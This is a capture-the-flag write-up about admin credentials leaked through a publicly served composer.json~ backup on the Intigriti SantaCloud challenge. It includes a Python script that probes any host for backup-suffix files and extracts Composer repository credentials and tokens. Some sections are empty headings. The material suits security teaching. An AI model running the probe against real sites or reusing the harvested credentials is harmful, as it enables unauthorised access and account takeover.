Intigriti SantaCloud CTF - Security Writeup

Executive Summary

This writeup documents the discovery of administrative credentials exposed in a backup copy of a configuration file (composer.json~) on the Intigriti SantaCloud CTF challenge website. Because the web server serves the backup copy to anyone who requests it, the credentials can be read without authentication and then reused to log in to the administrative interface.


Vulnerability Details

Asset Information

Impact

The exposure of administrative credentials in a publicly readable backup file leads to complete administrative account takeover. An attacker does not need to bypass or brute-force authentication: the leaked username and password are accepted by the admin panel as-is, giving full control of it.


Proof of Concept

Step-by-Step Reproduction

  1. **Access the backup configuration file:** Navigate to https://santacloud.intigriti.io/composer.json~

     Note: You must manually add the tilde (~) character at the end of the URL in the browser address bar. The trailing tilde is the suffix that many editors append to the backup copy they keep of a file being edited; here that stale copy was deployed alongside the real composer.json and is served by the web server.
  2. **Examine the JSON response:** The config section of the JSON file contains sensitive information including:
  3. **Identify the admin endpoint (Optional):** To discover hidden endpoints and gather additional OSINT data, you can use the HTML Inspector Chrome Extension. This extension helps extract:
  4. **Access admin panel:** Use the discovered credentials to authenticate to the administrative interface.
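
The steps above are a manual walk-through. As an added example (not code from the writeup or from the challenge), the script below automates the first two steps and generalises them: it requests the common backup-suffix variants of a file (the `~` used here plus `.bak`, `.orig` and similar, which are assumed extras) and parses any JSON it gets back for the Composer `config` keys that legitimately carry credentials for private package repositories (`http-basic`, `github-oauth`, `gitlab-token`, and so on). The sample composer.json embedded in the script is constructed; its hostnames, username, password and token are placeholders, not values from the CTF, and the exact fields the challenge leaked are not reproduced here.

```python
"""Probe for backup copies of a config file and pull credentials out of a
leaked composer.json.  Added example for this writeup, not the challenge's
own code.  SAMPLE_COMPOSER_BACKUP is constructed; every host, user, password
and token in it is a placeholder."""
import json
import sys
import urllib.error
import urllib.request

# Suffixes editors and deployment tools leave behind next to the real file.
# The writeup's finding used the trailing "~"; the rest are assumed extras.
BACKUP_SUFFIXES = ("~", ".bak", ".orig", ".save", ".old", ".swp")

# Composer "config" keys that hold credentials for private repositories.
# These are real Composer settings; "http-basic" maps host -> {username,
# password}, the others map host -> token string.
SECRET_KEYS = {"http-basic", "github-oauth", "gitlab-oauth", "gitlab-token",
               "bitbucket-oauth", "bearer"}

SAMPLE_COMPOSER_BACKUP = """{
  "name": "example/app",
  "require": {"php": ">=8.1"},
  "config": {
    "http-basic": {
      "packages.example.test": {"username": "deploy", "password": "hunter2"}
    },
    "github-oauth": {"github.com": "ghp_placeholdertoken"}
  }
}"""


def backup_candidates(base_url: str, path: str) -> list[str]:
    """Return the URLs to request when hunting for backup copies of `path`."""
    base = base_url.rstrip("/")
    return [f"{base}/{path}{suffix}" for suffix in BACKUP_SUFFIXES]


def extract_composer_secrets(text: str) -> list[dict]:
    """Parse a composer.json body and list every credential under "config".

    Each finding is {"key", "host", "value"}; results are sorted so callers
    get a stable order.  Raises json.JSONDecodeError on a non-JSON body.
    """
    data = json.loads(text)
    config = data.get("config", {})
    findings = []
    for key in SECRET_KEYS & set(config):
        for host, cred in config[key].items():
            if isinstance(cred, dict):
                value = f"{cred.get('username')}:{cred.get('password')}"
            else:
                value = str(cred)
            findings.append({"key": key, "host": host, "value": value})
    return sorted(findings, key=lambda f: (f["key"], f["host"]))


def probe(base_url: str, path: str = "composer.json") -> dict[str, list[dict]]:
    """Fetch each candidate URL; return {url: findings} for the ones served.

    A URL that is served but is not JSON is reported with an empty list so
    the tester still knows a backup copy exists and can inspect it by hand.
    """
    hits = {}
    for url in backup_candidates(base_url, path):
        req = urllib.request.Request(url, headers={"User-Agent": "backup-probe"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode("utf-8", "replace")
        except (urllib.error.URLError, ValueError):
            continue  # 404, connection failure, bad URL: not served
        try:
            hits[url] = extract_composer_secrets(body)
        except json.JSONDecodeError:
            hits[url] = []
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live mode: python3 probe.py https://target.example
        for url, found in probe(sys.argv[1]).items():
            print(f"{url} served; {len(found)} credential(s) in config")
    else:
        # Offline demo on the constructed sample; secrets are redacted.
        for f in extract_composer_secrets(SAMPLE_COMPOSER_BACKUP):
            print(f"{f['key']:14} {f['host']:24} {f['value'][:4]}...")
```

Only run `probe` against a host you are authorised to test. The same candidate list doubles as a quick regression check after remediation: every URL it generates should return 404, and a web-server rule denying paths that end in `~` or `.bak` is the usual fix.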

Flag Retrieved